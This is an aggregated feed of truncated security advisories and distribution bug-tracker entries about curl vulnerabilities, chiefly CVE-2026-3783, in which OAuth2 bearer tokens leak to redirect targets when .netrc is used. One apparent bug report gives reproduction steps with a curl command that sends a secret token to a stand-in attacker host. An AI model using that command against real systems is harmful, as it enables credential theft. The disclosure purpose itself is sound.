CVE-2026-3783: When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a redirect to a second URL, curl could leak that token to the second…

CVE-2026-3783 [MEDIUM] curl vulnerabilities Title: curl vulnerabilities Summary: Several security issues were fixed in curl. Zhicheng Chen discovered that curl could incorrectly reuse the wrong connection for Negotiate-authenticated HTTP or HTTPS requests. This could result in the use of credentials from a different connection, contrary to expectations. This issue only affected Ubuntu 20.04 LTS. (CVE-2026-1965) It was discovered that curl incorrectly leaked OAuth2 bearer tokens when following a redirect. This could result in tokens being sent to the wrong host, contrary to expectations. This issue only affected Ubuntu 20.04 LTS. (CVE-2026-3783) Muhamad Arga Reksapati discovered that curl incorrectly reused existing HTTP proxy connections even if the request used different credentials. This could result in the use of incorrect cr

CVE-2026-3783 [MEDIUM] CWE-201 curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a redirect to a second URL, curl could leak that token to the second hostname under some circumstances. If the hostname that the first request is redirected to has information in the used .netrc file, with either of the `machine` or `default` keywords, curl would pass on the bearer token set for the first host also to the second one. A flaw was found in curl. When an OAuth2 bearer token is used for an HTTP(S) transfer that redirects to a second URL, curl could unintentionally leak the token. This occurs if the second hostname has entries in the `.netrc` file, allowing the bearer token intended for the first host

CVE-2025-0167 [LOW] curl vulnerabilities Title: curl vulnerabilities Summary: Several security issues were fixed in curl. Zhicheng Chen discovered that curl could incorrectly reuse the wrong connection for Negotiate-authenticated HTTP or HTTPS requests. This could result in the use of credentials from a different connection, contrary to expectations. (CVE-2026-1965) It was discovered that curl incorrectly leaked OAuth2 bearer tokens when following a redirect. This could result in tokens being sent to the wrong host, contrary to expectations. (CVE-2026-3783) Muhamad Arga Reksapati discovered that curl incorrectly reused existing HTTP proxy connections even if the request used different credentials. This could result in the use of incorrect credentials, contrary to expectations. (CVE-2026-3784) Daniel Wade discovered that curl

CVE-2026-3783 [MEDIUM] token leak with redirect and netrc token leak with redirect and netrc Mariner: Mariner curl: curl Customer Action Required: Yes

CVE-2026-3783 [MEDIUM] CVE-2026-3783: curl - When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer p... When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a redirect to a second URL, curl could leak that token to the second hostname under some circumstances. If the hostname that the first request is redirected to has information in the used .netrc file, with either of the `machine` or `default` keywords, curl would pass on the bearer token set for the first host also to the second one. Scope: local bookworm: open bullseye: open forky: resolved (fixed in 8.19.0-1) sid: resolved (fixed in 8.19.0-1) trixie: open

CVE-2026-1965 [MEDIUM] curl vulnerabilities curl vulnerabilities Zhicheng Chen discovered that curl could incorrectly reuse the wrong connection for Negotiate-authenticated HTTP or HTTPS requests. This could result in the use of credentials from a different connection, contrary to expectations. This issue only affected Ubuntu 20.04 LTS. (CVE-2026-1965) It was discovered that curl incorrectly leaked OAuth2 bearer tokens when following a redirect. This could result in tokens being sent to the wrong host, contrary to expectations. This issue only affected Ubuntu 20.04 LTS. (CVE-2026-3783) Muhamad Arga Reksapati discovered that curl incorrectly reused existing HTTP proxy connections even if the request used different credentials. This could result in the use of incorrect credentials, contrary to expectations. (CVE-2026-3784)

CVE-2026-3783 [MEDIUM] CWE-522 GHSA-8whr-249c-vfjp: When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a redirect to a second URL, curl could leak that token to the When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a redirect to a second URL, curl could leak that token to the second hostname under some circumstances. If the hostname that the first request is redirected to has information in the used .netrc file, with either of the `machine` or `default` keywords, curl would pass on the bearer token set for the first host also to the second one.

CVE-2026-1965 [LOW] curl vulnerabilities curl vulnerabilities Zhicheng Chen discovered that curl could incorrectly reuse the wrong connection for Negotiate-authenticated HTTP or HTTPS requests. This could result in the use of credentials from a different connection, contrary to expectations. (CVE-2026-1965) It was discovered that curl incorrectly leaked OAuth2 bearer tokens when following a redirect. This could result in tokens being sent to the wrong host, contrary to expectations. (CVE-2026-3783) Muhamad Arga Reksapati discovered that curl incorrectly reused existing HTTP proxy connections even if the request used different credentials. This could result in the use of incorrect credentials, contrary to expectations. (CVE-2026-3784) Daniel Wade discovered that curl incorrectly handled certain memory operations when doing a s

CVE-2026-3783 [MEDIUM] CVE-2026-3783: When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a redirect to a second URL, curl could leak that token to the When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a redirect to a second URL, curl could leak that token to the second hostname under some circumstances. If the hostname that the first request is redirected to has information in the used .netrc file, with either of the `machine` or `default` keywords, curl would pass on the bearer token set for the first host also to the second one.

CVE-2025-15224 [LOW] CVE-2025-15224 Impact, Exploitability, and Mitigation Steps | Wiz ## CVE-2025-15224 : cURL vulnerability analysis and mitigation When doing SSH-based transfers using either SCP or SFTP, and asked to do public key authentication, curl would wrongly still ask and authenticate using a locally running SSH agent. Source : NVD ## 3.1 Score Published January 8, 2026 Severity LOW CNA Score 3.1 Affected Technologies cURL Alma Linux Has Public Exploit Yes Has CISA KEV Exploit No CISA KEV Release Date N/A CISA KEV Due Date N/A Exploitation Probability Percentile (EPSS) 24.4 Exploitation Probability (EPSS) 0.1 Affected packages and libraries curl libcurl4 Sources Alpine 3.10, 3.11, 3.12, 3.13, 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21 Severity LOW No Fix Added at: Jan 21, 2026 Alpine 3.22, 3.23 Severity LOW No Fix Added at: Jan 28, 2026

CVE-2025-15079 [MEDIUM] CVE-2025-15079 Impact, Exploitability, and Mitigation Steps | Wiz ## CVE-2025-15079 : cURL vulnerability analysis and mitigation When doing SSH-based transfers using either SCP or SFTP, and setting the known_hosts file, libcurl could still mistakenly accept connecting to hosts not present in the specified file if they were added as recognized in the libssh global known_hosts file. Source : NVD ## 5.3 Score Published January 8, 2026 Severity MEDIUM CNA Score 5.3 Affected Technologies cURL Alma Linux Has Public Exploit Yes Has CISA KEV Exploit No CISA KEV Release Date N/A CISA KEV Due Date N/A Exploitation Probability Percentile (EPSS) 10.3 Exploitation Probability (EPSS) N/A Affected packages and libraries curl-debuginfo libcurl-devel Sources Alpine 3.10, 3.11, 3.12, 3.13, 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21 Severity MED

CVE-2025-14819 [MEDIUM] CVE-2025-14819 Impact, Exploitability, and Mitigation Steps | Wiz ## CVE-2025-14819 : cURL vulnerability analysis and mitigation CURLSSLOPT_NO_PARTIALCHAIN Source : NVD ## 5.3 Score Published January 8, 2026 Severity MEDIUM CNA Score 5.3 Affected Technologies cURL Libcurl Has Public Exploit No Has CISA KEV Exploit No CISA KEV Release Date N/A CISA KEV Due Date N/A Exploitation Probability Percentile (EPSS) 13.9 Exploitation Probability (EPSS) N/A Affected packages and libraries libcurl-minimal-debuginfo libcurl-devel-doc Sources Alpine 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21 Severity MEDIUM Has Fix Added at: Jan 21, 2026 Alpine 3.22, 3.23 Severity MEDIUM Has Fix Added at: Jan 28, 2026 Alpine edge Severity MEDIUM Has Fix Added at: Jan 08, 2026 Container-Optimized OS Severity MEDIUM Has Fix Added at: Mar 03, 2026 Debian 1

CVE-2026-3805 [MEDIUM] CVE-2026-3805 Impact, Exploitability, and Mitigation Steps | Wiz ## CVE-2026-3805 : cURL vulnerability analysis and mitigation When doing a second SMB request to the same host again, curl would wrongly use a data pointer pointing into already freed memory. Source : NVD ## 7.5 Score Published March 11, 2026 Severity HIGH CNA Score 7.5 Affected Technologies cURL Libcurl Has Public Exploit Yes Has CISA KEV Exploit No CISA KEV Release Date N/A CISA KEV Due Date N/A Exploitation Probability Percentile (EPSS) 11.7 Exploitation Probability (EPSS) N/A Affected packages and libraries rust-debugger-common rust-src Sources Alpine 3.19, 3.20, 3.21, 3.22, 3.23, edge Severity HIGH Has Fix Added at: Mar 13, 2026 Debian 13 Severity MEDIUM No Fix Added at: Mar 12, 2026 Debian 14 Severity HIGH Has Fix Added at: Mar 12, 2026 Homebrew Severity HI

CVE-2025-14524 [MEDIUM] CVE-2025-14524 Impact, Exploitability, and Mitigation Steps | Wiz ## CVE-2025-14524 : cURL vulnerability analysis and mitigation When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a cross-protocol redirect to a second URL that uses an IMAP, LDAP, POP3 or SMTP scheme, curl might wrongly pass on the bearer token to the new target host. Source : NVD ## 5.3 Score Published January 8, 2026 Severity MEDIUM CNA Score 5.3 Affected Technologies cURL Alma Linux Has Public Exploit Yes Has CISA KEV Exploit No CISA KEV Release Date N/A CISA KEV Due Date N/A Exploitation Probability Percentile (EPSS) 7.2 Exploitation Probability (EPSS) N/A Affected packages and libraries libcurl-devel-32bit curl-zsh-completion Sources Alpine 3.10, 3.11, 3.12, 3.13, 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21 Severity MEDI

CVE-2026-3784 [MEDIUM] CVE-2026-3784 Impact, Exploitability, and Mitigation Steps | Wiz ## CVE-2026-3784 : cURL vulnerability analysis and mitigation curl would wrongly reuse an existing HTTP proxy connection doing CONNECT to a server, even if the new request uses different credentials for the HTTP proxy. The proper behavior is to create or use a separate connection. Source : NVD ## 6.5 Score Published March 11, 2026 Severity MEDIUM CNA Score 6.5 Affected Technologies cURL Alma Linux Has Public Exploit Yes Has CISA KEV Exploit No CISA KEV Release Date N/A CISA KEV Due Date N/A Exploitation Probability Percentile (EPSS) 3.1 Exploitation Probability (EPSS) N/A Affected packages and libraries libcurl rust-doc Sources Alpine 3.10, 3.11, 3.12, 3.13, 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21, 3.22, 3.23, edge Severity MEDIUM Has Fix Added at: Mar 13, 20

CVE-2026-1965 [MEDIUM] CVE-2026-1965 Impact, Exploitability, and Mitigation Steps | Wiz ## CVE-2026-1965 : cURL vulnerability analysis and mitigation libcurl can in some circumstances reuse the wrong connection when asked to do an Negotiate-authenticated HTTP or HTTPS request. libcurl features a pool of recent connections so that subsequent requests can reuse an existing connection to avoid overhead. When reusing a connection a range of criterion must first be met. Due to a logical error in the code, a request that was issued by an application could wrongfully reuse an existing connection to the same server that was authenticated using different credentials. One underlying reason being that Negotiate sometimes authenticates connections and not requests , contrary to how HTTP is designed to work. user1:password1 user2:password2 CURLOPT_HTTPAUTH CURLOPT_FRESH_CONNECT C

CVE-2025-13034 [MEDIUM] CVE-2025-13034 Impact, Exploitability, and Mitigation Steps | Wiz ## CVE-2025-13034 : cURL vulnerability analysis and mitigation CURLOPT_PINNEDPUBLICKEY --pinnedpubkey This check was skipped in a certain condition that would then make curl allow the connection without performing the proper check, thus not noticing a possible impostor. To skip this check, the connection had to be done with QUIC with ngtcp2 built to use GnuTLS and the user had to explicitly disable the standard certificate verification. Source : NVD ## 5.9 Score Published January 8, 2026 Severity MEDIUM CNA Score 5.9 Affected Technologies cURL Libcurl Has Public Exploit No Has CISA KEV Exploit No CISA KEV Release Date N/A CISA KEV Due Date N/A Exploitation Probability Percentile (EPSS) 1.2 Exploitation Probability (EPSS) N/A Affected packages and libraries curl curl

CVE-2025-11563 [MEDIUM] CVE-2025-11563 Impact, Exploitability, and Mitigation Steps | Wiz ## CVE-2025-11563 : cURL vulnerability analysis and mitigation ## Overview CVE-2025-11563 is a path traversal vulnerability affecting wcurl, discovered on October 6, 2025, and publicly disclosed on November 4, 2025. The vulnerability affects wcurl versions shipped with curl 8.14.0 to 8.16.0 and standalone wcurl versions from 2024.12.08 to 2025.09.27. This security flaw allows URLs containing percent-encoded slashes (/ or ) to trick wcurl into saving output files outside of the current directory without explicit user permission ( Curl Advisory ). ## Technical details The vulnerability is classified as CWE-35: Path Traversal with a Moderate severity rating. The issue stems from wcurl's handling of percent-encoded slashes in URLs, where the tool incorrectly processes URLs containing p

CVE-2025-14017 [MEDIUM] CVE-2025-14017 Impact, Exploitability, and Mitigation Steps | Wiz ## CVE-2025-14017 : cURL vulnerability analysis and mitigation When doing multi-threaded LDAPS transfers (LDAP over TLS) with libcurl, changing TLS options in one thread would inadvertently change them globally and therefore possibly also affect other concurrently setup transfers. Disabling certificate verification for a specific transfer could unintentionally disable the feature for other threads as well. Source : NVD ## 6.3 Score Published January 8, 2026 Severity MEDIUM CNA Score 6.3 Affected Technologies cURL Libcurl Has Public Exploit No Has CISA KEV Exploit No CISA KEV Release Date N/A CISA KEV Due Date N/A Exploitation Probability Percentile (EPSS) 0.6 Exploitation Probability (EPSS) N/A Affected packages and libraries snphost cpe:2.3:a:haxx:curl Sources Alp

CVE-2026-3783 [MEDIUM] CVE-2026-3783 Impact, Exploitability, and Mitigation Steps | Wiz ## CVE-2026-3783 : cURL vulnerability analysis and mitigation When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a redirect to a second URL, curl could leak that token to the second hostname under some circumstances. machine default Source : NVD ## 5.3 Score Published March 11, 2026 Severity MEDIUM CNA Score 5.3 Affected Technologies cURL Alma Linux Has Public Exploit Yes Has CISA KEV Exploit No CISA KEV Release Date N/A CISA KEV Due Date N/A Exploitation Probability Percentile (EPSS) 3.5 Exploitation Probability (EPSS) N/A Affected packages and libraries s390utils-mon_statd trustee-guest-components Sources Alpine 3.10, 3.11, 3.12, 3.13, 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21, 3.22, 3.23, edge Severity MEDIUM Has Fix Ad

CVE-2026-3783 [MEDIUM] Bearer Token Leaked to Attacker via .netrc Despite CVE-2026-3783 Fix Bearer Token Leaked to Attacker via .netrc Despite CVE-2026-3783 Fix curl versions 8.19.0 and later were meant to fix CVE-2026-3783, which causes OAuth2 bearer tokens to leak on HTTP redirects when the user has a .netrc file configured. However, the vulnerability still exists in the current codebase. VULNERABILITY: When a curl user specifies an OAuth2 bearer token via --oauth2-bearer and also uses the --netrc flag to enable .netrc authentication, curl fails to prevent the bearer token from being sent to redirect targets. AFFECTED VERSIONS: 8.17.0, 8.19.0, 8.19.1-DEV, 8.19.x REPRODUCTION: 1. Create .netrc with attacker domain entry 2. Run: curl --oauth2-bearer 'SECRET_TOKEN' --netrc --location http://redirect-to-attacker.com 3. Bearer token sent to attacker ROOT CAUSE: lib/http.c:825-8

CVE-2026-3783 [MEDIUM] CVE-2026-3783 trustee-guest-components: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-42] CVE-2026-3783 trustee-guest-components: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-42] Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process. Discussion: This message is a reminder that Fedora Linux 42 is nearing its end of life. Fedora will stop maintaining and issuing updates for Fedora Linux 42 on 2026-05-13. It is Fedora's policy to close all bug reports from releases that are no longer maintained. At that time this bug will be closed as EOL if it remains open with a 'version' of '42'. Package Maintainer: If you wish for this bug to remain open because you plan to fi

CVE-2026-3783 [MEDIUM] CVE-2026-3783 curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-42] CVE-2026-3783 curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-42] Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process. Discussion: FEDORA-2026-907bbf2a13 (curl-8.11.1-8.fc42) has been submitted as an update to Fedora 42. https://bodhi.fedoraproject.org/updates/FEDORA-2026-907bbf2a13 --- FEDORA-2026-907bbf2a13 has been pushed to the Fedora 42 testing repository. Soon you'll be able to install the update with the following command: `sudo dnf upgrade --enablerepo=updates-testing --refresh --advisory=FEDORA-2026-907bbf2a13` You can provide feedback for this update here:

CVE-2026-3783 [MEDIUM] CVE-2026-3783 mingw-curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-42] CVE-2026-3783 mingw-curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-42] Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process. Discussion: This message is a reminder that Fedora Linux 42 is nearing its end of life. Fedora will stop maintaining and issuing updates for Fedora Linux 42 on 2026-05-13. It is Fedora's policy to close all bug reports from releases that are no longer maintained. At that time this bug will be closed as EOL if it remains open with a 'version' of '42'. Package Maintainer: If you wish for this bug to remain open because you plan to fix it in a curr

CVE-2026-3783 [MEDIUM] CVE-2026-3783 curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect CVE-2026-3783 curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a redirect to a second URL, curl could leak that token to the second hostname under some circumstances. If the hostname that the first request is redirected to has information in the used .netrc file, with either of the `machine` or `default` keywords, curl would pass on the bearer token set for the first host also to the second one.

CVE-2026-3783 [MEDIUM] CVE-2026-3783: token leak with redirect and netrc CVE-2026-3783: token leak with redirect and netrc ##Summary When `--oauth2-bearer` is used with `--netrc` and curl follows a redirect, the bearer token leaks to the redirect target. The netrc bypass at `http.c:822` skips `Curl_auth_allowed_to_host()`, allowing the token through. This is an incomplete fix for CVE-2025-14524 — the Dec 2025 SASL fix patched `curl_sasl.c` but missed the HTTP bearer path. This is an incomplete fix for the same vulnerability class as CVE-2025-14524. The Dec 2025 SASL bearer fix (commit `1a822275d3`, PR #19933) patched `lib/curl_sasl.c` but left the HTTP bearer path at `lib/http.c:704-714` unprotected. ## Version curl 8.10.1 (confirmed), also present in current master `d9c2c64337`. All versions supporting `--oauth2-bearer` with `--netrc` are affected. **The n

CVE-2026-3783 [MEDIUM] CVE-2026-3783 curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-43] CVE-2026-3783 curl: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-43] Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process. Discussion: FEDORA-2026-66db242036 (curl-8.15.0-6.fc43) has been submitted as an update to Fedora 43. https://bodhi.fedoraproject.org/updates/FEDORA-2026-66db242036 --- FEDORA-2026-66db242036 has been pushed to the Fedora 43 testing repository. Soon you'll be able to install the update with the following command: `sudo dnf upgrade --enablerepo=updates-testing --refresh --advisory=FEDORA-2026-66db242036` You can provide feedback for this update here:

CVE-2026-3783 [MEDIUM] CVE-2026-3783 rpi-imager: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-42] CVE-2026-3783 rpi-imager: curl: Information disclosure via OAuth2 bearer token leakage during HTTP(S) redirect [fedora-42] Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process. Discussion: This message is a reminder that Fedora Linux 42 is nearing its end of life. Fedora will stop maintaining and issuing updates for Fedora Linux 42 on 2026-05-13. It is Fedora's policy to close all bug reports from releases that are no longer maintained. At that time this bug will be closed as EOL if it remains open with a 'version' of '42'. Package Maintainer: If you wish for this bug to remain open because you plan to fix it in a curr